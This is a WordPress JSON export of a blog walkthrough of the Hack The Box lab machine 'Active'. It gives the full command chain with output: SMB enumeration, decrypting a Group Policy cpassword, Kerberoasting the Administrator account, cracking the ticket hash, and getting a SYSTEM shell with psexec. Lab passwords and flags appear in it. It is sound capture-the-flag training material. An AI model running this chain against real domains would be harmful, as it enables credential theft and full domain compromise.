{"id":1408,"date":"2021-07-27T14:02:35","date_gmt":"2021-07-27T14:02:35","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1408"},"modified":"2021-07-27T14:02:35","modified_gmt":"2021-07-27T14:02:35","slug":"active","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/27\/active\/","title":{"rendered":"Active"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Machine Name<\/th>\n<th>Difficulty<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/Active\" title=\"Active\">Active<\/a> - HTB<\/td>\n<td>Easy<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/5837ac5e28291146a9f2a8a015540c28.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>Let's start with an Nmap scan.<\/p>\n<pre><code class=\"language-sh\">Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-27 08:05 EDT\nNmap scan report for 10.10.10.100\nHost is up (0.16s latency).\nNot shown: 65512 closed ports\nPORT      STATE SERVICE       VERSION\n53\/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)\n| dns-nsid: \n|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)\n88\/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-27 12:30:55Z)\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)\n445\/tcp   open  microsoft-ds?\n464\/tcp   open  kpasswd5?\n593\/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  tcpwrapped\n3268\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)\n3269\/tcp  open  tcpwrapped\n5722\/tcp  open  msrpc         Microsoft Windows 
RPC\n9389\/tcp  open  mc-nmf        .NET Message Framing\n47001\/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n49152\/tcp open  msrpc         Microsoft Windows RPC\n49153\/tcp open  msrpc         Microsoft Windows RPC\n49154\/tcp open  msrpc         Microsoft Windows RPC\n49155\/tcp open  msrpc         Microsoft Windows RPC\n49157\/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n49158\/tcp open  msrpc         Microsoft Windows RPC\n49169\/tcp open  msrpc         Microsoft Windows RPC\n49171\/tcp open  msrpc         Microsoft Windows RPC\n49182\/tcp open  msrpc         Microsoft Windows RPC\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=7\/27%OT=53%CT=1%CU=31977%PV=Y%DS=2%DC=T%G=Y%TM=60FFF9C\nOS:F%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=\nOS:7)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%TS=7)OPS(O1=M54BNW8ST11%O2=M54\nOS:BNW8ST11%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11)WIN(W\nOS:1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%\nOS:O=M54BNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%\nOS:T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD\nOS:=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S\nOS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R\nOS:=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%\nOS:RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)\n\nNetwork Distance: 2 hops\nService Info: Host: DC; OS: Windows; CPE: cpe:\/o:microsoft:windows_server_2008:r2:sp1, cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: 13m01s\n| smb2-security-mode: \n|   2.02: \n|_    Message signing enabled and required\n| smb2-time: \n|   date: 2021-07-27T12:32:20\n|_  start_date: 
2021-07-27T05:05:54\n\nTRACEROUTE (using port 111\/tcp)\nHOP RTT       ADDRESS\n1   189.49 ms 10.10.16.1\n2   73.41 ms  10.10.10.100\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 811.04 seconds\n<\/code><\/pre>\n<p>It is clearly a DC (DNS, Kerberos and LDAP are all listening), and our domain name is active.htb<br \/>\nLet's start enumerating over SMB right away. I'm sharing the notable parts of the enum4linux output below.<\/p>\n<pre><code> ========================================= \n|    Share Enumeration on 10.10.10.100    |\n ========================================= \n[V] Attempting to get share list using authentication\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\n    Sharename       Type      Comment\n    ---------       ----      -------\n    ADMIN$          Disk      Remote Admin\n    C$              Disk      Default share\n    IPC$            IPC       Remote IPC\n    NETLOGON        Disk      Logon server share \n    Replication     Disk      \n    SYSVOL          Disk      Logon server share \n    Users           Disk      \nSMB1 disabled -- no workgroup available\n\n[+] Attempting to map shares on 10.10.10.100\n[V] Attempting map to share \/\/10.10.10.100\/ADMIN$ with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;ADMIN$&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/ADMIN$   Mapping: DENIED, Listing: N\/A\n[V] Attempting map to share \/\/10.10.10.100\/C$ with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;C$&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) 
or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/C$   Mapping: DENIED, Listing: N\/A\n[V] Attempting map to share \/\/10.10.10.100\/IPC$ with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;IPC$&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/IPC$ Mapping: OK Listing: DENIED\n[V] Attempting map to share \/\/10.10.10.100\/NETLOGON with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;NETLOGON&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/NETLOGON Mapping: DENIED, Listing: N\/A\n[V] Attempting map to share \/\/10.10.10.100\/Replication with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;Replication&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/Replication  Mapping: OK, Listing: OK\n[V] Attempting map to share \/\/10.10.10.100\/SYSVOL with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;SYSVOL&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) 
or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/SYSVOL   Mapping: DENIED, Listing: N\/A\n[V] Attempting map to share \/\/10.10.10.100\/Users with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;Users&#039; -U&#039;&#039;%&#039;&#039; -c dir 2&gt;&amp;1\n\/\/10.10.10.100\/Users    Mapping: DENIED, Listing: N\/A<\/code><\/pre>\n<p>Checking with smbmap as well (null session: empty username and password), we get the same results.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# smbmap -u &quot;&quot; -p &quot;&quot; -H 10.10.10.100                                                                                                                                                                                                    2 \u2a2f\n[+] IP: 10.10.10.100:445    Name: unknown                                           \n        Disk                                                    Permissions Comment\n    ----                                                    ----------- -------\n    ADMIN$                                              NO ACCESS   Remote Admin\n    C$                                                  NO ACCESS   Default share\n    IPC$                                                NO ACCESS   Remote IPC\n    NETLOGON                                            NO ACCESS   Logon server share \n    Replication                                         READ ONLY   \n    SYSVOL                                              NO ACCESS   Logon server share \n    Users                                               NO ACCESS   \n<\/code><\/pre>\n<p>Now let's go in with smbclient and see what is there. Inside there were Group Policy objects, and I started thinking about whether I could obtain a user password from them. 
The article at <a href=\"https:\/\/adsecurity.org\/?p=2288\">https:\/\/adsecurity.org\/?p=2288<\/a> explains this topic: the cpassword attribute in Group Policy Preferences is AES-encrypted with a key that Microsoft published in its own documentation, so anyone who can read the policy files can decrypt it. As a result of my digging, I found user data.<\/p>\n<pre><code class=\"language-sh\">smb: \\active.htb\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\&gt; cd Groups\\\nsmb: \\active.htb\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\Groups\\&gt; ls\n  .                                   D        0  Sat Jul 21 06:37:44 2018\n  ..                                  D        0  Sat Jul 21 06:37:44 2018\n  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018\n\n        10459647 blocks of size 4096. 5727923 blocks available\nsmb: \\active.htb\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\Groups\\&gt; get Groups.xml \ngetting file \\active.htb\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\Groups\\Groups.xml of size 533 as Groups.xml (0.6 KiloBytes\/sec) (average 0.9 KiloBytes\/sec)<\/code><\/pre>\n<p>When we read this file, the password of the <strong>SVC_TGS<\/strong> user (the cpassword value) was sitting there waiting to be cracked.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# cat Groups.xml \n&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\n&lt;Groups clsid=&quot;{3125E937-EB16-4b4c-9934-544FC6D24D26}&quot;&gt;&lt;User clsid=&quot;{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}&quot; name=&quot;active.htb\\SVC_TGS&quot; image=&quot;2&quot; changed=&quot;2018-07-18 20:46:06&quot; uid=&quot;{EF57DA28-5F69-4530-A59E-AAB58578219D}&quot;&gt;&lt;Properties action=&quot;U&quot; newName=&quot;&quot; fullName=&quot;&quot; description=&quot;&quot; cpassword=&quot;edBSHOwhZLTjt\/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw\/NglVmQ&quot; changeLogon=&quot;0&quot; 
noChange=&quot;1&quot; neverExpires=&quot;1&quot; acctDisabled=&quot;0&quot; userName=&quot;active.htb\\SVC_TGS&quot;\/&gt;&lt;\/User&gt;\n&lt;\/Groups&gt;\n<\/code><\/pre>\n<p>I downloaded the ps1 script used in the link I gave above, opened PowerShell on Kali, and cracked the password. (<a href=\"https:\/\/raw.githubusercontent.com\/obscuresec\/PowerShell\/master\/Get-DecryptedCpassword\">https:\/\/raw.githubusercontent.com\/obscuresec\/PowerShell\/master\/Get-DecryptedCpassword<\/a>)<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# pwsh\nPowerShell 7.1.3\nCopyright (c) Microsoft Corporation.\n\nhttps:\/\/aka.ms\/powershell\nType &#039;help&#039; to get help.\n\nPS \/root\/oscp\/htb\/Active&gt; ls   \n&#039;a a&#039;   enum4linuxResult   Get-DecryptedCpassword.ps1   GPE.INI   GPT.INI   GptTmpl.inf   Groups.xml\nPS \/root\/oscp\/htb\/Active&gt; Import-Module .\/Get-DecryptedCpassword.ps1\nPS \/root\/oscp\/htb\/Active&gt; Get-DecryptedCpassword &quot;edBSHOwhZLTjt\/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw\/NglVmQ&quot;\nGPPstillStandingStrong2k18\nPS \/root\/oscp\/htb\/Active&gt; exit\n<\/code><\/pre>\n<p>Now we have a user. I still could not get a foothold inside, so I ran SMB enumeration again, hoping that with this user I could read the shares I had not been able to read before.<\/p>\n<pre><code> ========================================= \n|    Share Enumeration on 10.10.10.100    |\n ========================================= \n[V] Attempting to get share list using authentication\nUse of uninitialized value $global_workgroup in concatenation (.) 
or string at .\/enum4linux.pl line 654.\n\n    Sharename       Type      Comment\n    ---------       ----      -------\n    ADMIN$          Disk      Remote Admin\n    C$              Disk      Default share\n    IPC$            IPC       Remote IPC\n    NETLOGON        Disk      Logon server share \n    Replication     Disk      \n    SYSVOL          Disk      Logon server share \n    Users           Disk      \nSMB1 disabled -- no workgroup available\n\n[+] Attempting to map shares on 10.10.10.100\n[V] Attempting map to share \/\/10.10.10.100\/ADMIN$ with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;ADMIN$&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/ADMIN$   Mapping: DENIED, Listing: N\/A\n[V] Attempting map to share \/\/10.10.10.100\/C$ with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;C$&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/C$   Mapping: DENIED, Listing: N\/A\n[V] Attempting map to share \/\/10.10.10.100\/IPC$ with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;IPC$&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/IPC$ [E] Can&#039;t understand response:\nNT_STATUS_INVALID_PARAMETER listing \\*\n[V] Attempting map to share \/\/10.10.10.100\/NETLOGON with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;NETLOGON&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) 
or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/NETLOGON Mapping: OK, Listing: OK\n[V] Attempting map to share \/\/10.10.10.100\/Replication with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;Replication&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/Replication  Mapping: OK, Listing: OK\n[V] Attempting map to share \/\/10.10.10.100\/SYSVOL with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;SYSVOL&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\nUse of uninitialized value $global_workgroup in concatenation (.) or string at .\/enum4linux.pl line 654.\n\/\/10.10.10.100\/SYSVOL   Mapping: OK, Listing: OK\n[V] Attempting map to share \/\/10.10.10.100\/Users with command: smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;Users&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; -c dir 2&gt;&amp;1\n\/\/10.10.10.100\/Users    Mapping: OK, Listing: OK<\/code><\/pre>\n<p>With the user we now have, we have more rights: NETLOGON, SYSVOL and Users are readable too.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# smbmap -u &quot;SVC_TGS&quot; -p &quot;GPPstillStandingStrong2k18&quot; -H 10.10.10.100                                                                                                                                                                   1 \u2a2f\n[+] IP: 10.10.10.100:445    Name: 10.10.10.100                                      \n        Disk                                                    Permissions Comment\n    ----                                                    ----------- -------\n    ADMIN$                                              NO ACCESS   Remote Admin\n    C$                                                  NO 
ACCESS   Default share\n    IPC$                                                NO ACCESS   Remote IPC\n    NETLOGON                                            READ ONLY   Logon server share \n    Replication                                         READ ONLY   \n    SYSVOL                                              READ ONLY   Logon server share \n    Users                                               READ ONLY<\/code><\/pre>\n<p>And that is how I got the first flag.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# smbclient -W &#039;&#039; \/\/&#039;10.10.10.100&#039;\/&#039;Users&#039; -U&#039;SVC_TGS&#039;%&#039;GPPstillStandingStrong2k18&#039; 2&gt;&amp;1\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                  DR        0  Sat Jul 21 10:39:20 2018\n  ..                                 DR        0  Sat Jul 21 10:39:20 2018\n  Administrator                       D        0  Mon Jul 16 06:14:21 2018\n  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009\n  Default                           DHR        0  Tue Jul 14 02:38:21 2009\n  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009\n  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009\n  Public                             DR        0  Tue Jul 14 00:57:55 2009\n  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018\n\n        10459647 blocks of size 4096. 5727623 blocks available\nsmb: \\&gt; cd SVC_TGS\\\nsmb: \\SVC_TGS\\&gt; ls\n  .                                   D        0  Sat Jul 21 11:16:32 2018\n  ..                                  
D        0  Sat Jul 21 11:16:32 2018\n  Contacts                            D        0  Sat Jul 21 11:14:11 2018\n  Desktop                             D        0  Sat Jul 21 11:14:42 2018\n  Downloads                           D        0  Sat Jul 21 11:14:23 2018\n  Favorites                           D        0  Sat Jul 21 11:14:44 2018\n  Links                               D        0  Sat Jul 21 11:14:57 2018\n  My Documents                        D        0  Sat Jul 21 11:15:03 2018\n  My Music                            D        0  Sat Jul 21 11:15:32 2018\n  My Pictures                         D        0  Sat Jul 21 11:15:43 2018\n  My Videos                           D        0  Sat Jul 21 11:15:53 2018\n  Saved Games                         D        0  Sat Jul 21 11:16:12 2018\n  Searches                            D        0  Sat Jul 21 11:16:24 2018\n\n        10459647 blocks of size 4096. 5727623 blocks available\nsmb: \\SVC_TGS\\&gt; cd Desktop\\\nsmb: \\SVC_TGS\\Desktop\\&gt; ls\n  .                                   D        0  Sat Jul 21 11:14:42 2018\n  ..                                  D        0  Sat Jul 21 11:14:42 2018\n  user.txt                            A       34  Sat Jul 21 11:06:25 2018\n\n        10459647 blocks of size 4096. 5727623 blocks available\nsmb: \\SVC_TGS\\Desktop\\&gt; get user.txt\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# cat user.txt \n86d67d8ba232bb6a254aa4d10159e983\n<\/code><\/pre>\n<p>At this point I was getting tired of this and ran BloodHound. 
Time to gather information with LDAP queries.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active\/bloodhound]\n\u2514\u2500# bloodhound-python -u SVC_TGS -p GPPstillStandingStrong2k18 -d active.htb  -ns 10.10.10.100  -c all           \nINFO: Found AD domain: active.htb\nINFO: Connecting to LDAP server: dc.active.htb\nINFO: Found 1 domains\nINFO: Found 1 domains in the forest\nINFO: Found 1 computers\nINFO: Connecting to LDAP server: dc.active.htb\nINFO: Found 4 users\nINFO: Found 40 groups\nINFO: Found 0 trusts\nINFO: Starting computer enumeration with 10 workers\nINFO: Querying computer: DC.active.htb\n<\/code><\/pre>\n<p>While examining the BloodHound data, I discovered that the Administrator user has an SPN set. So I immediately requested a service ticket for it to get a crackable hash (Kerberoasting). However, I got an error.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# python3 \/root\/tool\/AD\/impacket\/examples\/GetUserSPNs.py active.htb\/SVC_TGS:GPPstillStandingStrong2k18 -request                                                                                                                         1 \u2a2f\nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\nServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation \n--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------\nactive\/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             \n\n[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)<\/code><\/pre>\n<p>When you get an error like this, we need to synchronize our clock with the DC: Kerberos rejects requests whose timestamp differs from the KDC's clock by more than the allowed skew (5 minutes by default), and the Nmap host script results above already reported a clock-skew of 13m01s. 
(<a href=\"https:\/\/book.hacktricks.xyz\/windows\/active-directory-methodology\/kerberoast\">https:\/\/book.hacktricks.xyz\/windows\/active-directory-methodology\/kerberoast<\/a>)<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# ntpdate 10.10.10.100                \n27 Jul 09:51:18 ntpdate[2257]: step time server 10.10.10.100 offset +781.865165 sec<\/code><\/pre>\n<p>Let's try again (note that \/etc\/resolv.conf points at the DC as the nameserver, so the dc.active.htb name resolves).<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# cat \/etc\/resolv.conf\nnameserver 10.10.10.100\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# python3 \/root\/tool\/AD\/impacket\/examples\/GetUserSPNs.py active.htb\/SVC_TGS:GPPstillStandingStrong2k18 -request\nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\nServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation \n--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------\nactive\/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             \n\n$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\/Administrator*$27a9be7702cf025d854f726fe25fdffd$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<\/code><\/pre>\n<p>Great, now let's crack it.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Active]\n\u2514\u2500# john hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt                                                                                                                                                                                 1 
\u2a2f\nUsing default input encoding: UTF-8\nLoaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])\nWill run 4 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nTicketmaster1968 (?)\n1g 0:00:00:04 DONE (2021-07-27 09:52) 0.2132g\/s 2246Kp\/s 2246Kc\/s 2246KC\/s Tiffani1432..Thrash1\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/tool\/AD\/impacket\/examples]\n\u2514\u2500# python3 psexec.py Administrator:Ticketmaster1968@10.10.10.100                                \nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\n[*] Requesting shares on 10.10.10.100.....\n[*] Found writable share ADMIN$\n[*] Uploading file ONeZjpOH.exe\n[*] Opening SVCManager on 10.10.10.100.....\n[*] Creating service iDPJ on 10.10.10.100.....\n[*] Starting service iDPJ.....\n[!] Press help for extra shell commands\nMicrosoft Windows [Version 6.1.7601]\nCopyright (c) 2009 Microsoft Corporation.  
All rights reserved.\n\nC:\\Windows\\system32&gt;whoami\nnt authority\\system\n\nC:\\Windows\\system32&gt;cd C:\\Users\\Administrator\\Desktop\\\n\nC:\\Users\\Administrator\\Desktop&gt;dir\n Volume in drive C has no label.\n Volume Serial Number is 2AF3-72E4\n\n Directory of C:\\Users\\Administrator\\Desktop\n\n21\/01\/2021  07:49 \u00d6\u00d6    &lt;DIR&gt;          .\n21\/01\/2021  07:49 \u00d6\u00d6    &lt;DIR&gt;          ..\n21\/07\/2018  06:06 \u00d6\u00d6                34 root.txt\n               1 File(s)             34 bytes\n               2 Dir(s)  23.460.220.928 bytes free\n\nC:\\Users\\Administrator\\Desktop&gt;type root.txt\nb5fc76d1d6b91d77b2fbf2d54d0f708b\n\nC:\\Users\\Administrator\\Desktop&gt;\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Machine Name Difficulty OS Logo Active &#8211; HTB Easy Windows Walkthrough Let's start with an Nmap scan. Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-27 08:05 EDT&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/27\/active\/\">Continue reading<span 
class=\"screen-reader-text\">Active<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[269,320,498],"tags":[575,417],"class_list":["post-1408","post","type-post","status-publish","format-standard","hentry","category-active-directory","category-powershell","category-walkthrough","tag-group-policy","tag-spn","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1408","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1408"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1408\/revisions"}],"predecessor-version":[{"id":1409,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1408\/revisions\/1409"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1408"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1408"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1408"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}